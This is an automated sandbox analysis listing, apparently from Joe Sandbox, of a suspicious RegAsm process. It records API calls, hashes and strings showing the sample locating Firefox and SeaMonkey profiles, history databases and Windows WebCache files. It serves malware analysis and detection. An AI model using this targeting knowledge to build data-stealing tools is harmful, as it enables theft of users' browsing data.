                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                            • API String ID: 4039892925-2068335096
                            • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                            • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                            APIs
                            • memset.MSVCRT ref: 00403FE1
                            • memset.MSVCRT ref: 00403FF6
                            • memset.MSVCRT ref: 0040400B
                            • memset.MSVCRT ref: 00404020
                            • memset.MSVCRT ref: 00404035
                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                            • memset.MSVCRT ref: 004040FC
                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                            • API String ID: 4039892925-3369679110
                            • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                            • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                            • API String ID: 3510742995-2641926074
                            • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                            • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                            APIs
                            • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                            • GetLastError.KERNEL32 ref: 0041847E
                            • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@CreateErrorFileLast
                            • String ID: |A
                            • API String ID: 4200628931-1717621600
                            • Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                            • Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                            APIs
                              • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                            • memset.MSVCRT ref: 004033B7
                            • memcpy.MSVCRT ref: 004033D0
                            • wcscmp.MSVCRT ref: 004033FC
                            • _wcsicmp.MSVCRT ref: 00403439
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                            • String ID: $0.@
                            • API String ID: 3030842498-1896041820
                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                            APIs
                            • memset.MSVCRT ref: 00403C09
                            • memset.MSVCRT ref: 00403C1E
                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                            • wcscat.MSVCRT ref: 00403C47
                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                            • wcscat.MSVCRT ref: 00403C70
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                            • API String ID: 1534475566-1174173950
                            • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                            • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                            • String ID:
                            • API String ID: 669240632-0
                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                            APIs
                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • memset.MSVCRT ref: 00414C87
                            • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • wcscpy.MSVCRT ref: 00414CFC
                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                            Strings
                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                            • API String ID: 2925649097-2036018995
                            • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                            • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                            APIs
                            • wcschr.MSVCRT ref: 00414458
                            • _snwprintf.MSVCRT ref: 0041447D
                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                            • String ID: "%s"
                            • API String ID: 1343145685-3297466227
                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                            APIs
                            • memset.MSVCRT ref: 004087D6
                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                            • memset.MSVCRT ref: 00408828
                            • memset.MSVCRT ref: 00408840
                            • memset.MSVCRT ref: 00408858
                            • memset.MSVCRT ref: 00408870
                            • memset.MSVCRT ref: 00408888
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                            • String ID:
                            • API String ID: 2911713577-0
                            • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                            • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcmp
                            • String ID: @ $SQLite format 3
                            • API String ID: 1475443563-3708268960
                            • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                            • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _wcsicmpqsort
                            • String ID: /nosort$/sort
                            • API String ID: 1579243037-1578091866
                            • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                            • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                            APIs
                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: HandleModuleProcessTimes
                            • String ID: GetProcessTimes$kernel32.dll
                            • API String ID: 116129598-3385500049
                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                            APIs
                            • memset.MSVCRT ref: 0040E60F
                            • memset.MSVCRT ref: 0040E629
                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            Strings
                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                            • API String ID: 2887208581-2114579845
                            • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                            • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                            APIs
                            • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                            • LockResource.KERNEL32(00000000), ref: 004148EF
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Resource$FindLoadLockSizeof
                            • String ID:
                            • API String ID: 3473537107-0
                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@
                            • String ID:
                            • API String ID: 613200358-0
                            • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                            • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                            • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                            • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                            APIs
                            Strings
                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset
                            • String ID: only a single result allowed for a SELECT that is part of an expression
                            • API String ID: 2221118986-1725073988
                            • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                            • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcmp
                            • String ID: $$8
                            • API String ID: 1475443563-435121686
                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                            APIs
                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                              • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                              • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                              • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                              • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                            • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                              • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                            • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                            • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                              • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$Handle$Close$ProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                            • String ID:
                            • API String ID: 2722907921-0
                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                            APIs
                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                            • memset.MSVCRT ref: 00403A55
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                              • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                            • String ID: history.dat$places.sqlite
                            • API String ID: 3093078384-467022611
                            • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                            • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                            APIs
                              • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                            • GetLastError.KERNEL32 ref: 00417627
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ErrorLast$File$PointerRead
                            • String ID:
                            • API String ID: 839530781-0
                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FileFindFirst
                            • String ID: *.*$index.dat
                            • API String ID: 1974802433-2863569691
                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@mallocmemcpy
                            • String ID:
                            • API String ID: 3831604043-0
                            • Opcode ID: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                            • Opcode Fuzzy Hash: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                            APIs
                            • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                            • GetLastError.KERNEL32 ref: 004175A2
                            • GetLastError.KERNEL32 ref: 004175A8
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ErrorLast$FilePointer
                            • String ID:
                            • API String ID: 1156039329-0
